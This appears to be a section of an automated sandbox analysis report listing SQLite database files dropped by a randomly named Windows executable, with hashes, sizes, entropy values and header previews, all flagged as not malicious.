                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                Category:dropped
                                                                                                Size (bytes):28672
                                                                                                Entropy (8bit):2.5793180405395284
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):159744
Entropy (8bit):0.7873599747470391
Encrypted:false
SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:false
Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false
Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5712781801655107
Encrypted:false
SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:05A60B4620923FD5D53B9204391452AF
SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5712781801655107
Encrypted:false
SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:05A60B4620923FD5D53B9204391452AF
SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:false
Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false
Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):126976
                                                                                                Entropy (8bit):0.47147045728725767
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
